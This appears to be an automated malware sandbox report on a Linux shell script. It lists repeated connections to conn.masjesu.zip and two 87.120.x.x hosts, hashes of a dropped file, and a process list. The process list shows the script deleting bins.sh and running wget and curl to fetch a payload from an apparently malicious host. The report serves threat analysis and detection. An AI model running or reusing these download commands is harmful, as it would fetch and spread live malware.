| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 02:13
Reported
2024-10-28 02:15
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh
[/tmp/1d43a86626e757581c833eb1c3c1c86ca410d4f8ceeed084749eeb7c39fd4da1.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/5RjnFNdEOpzG4ftduD3rV4JqC6Fb7OeR7d]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp |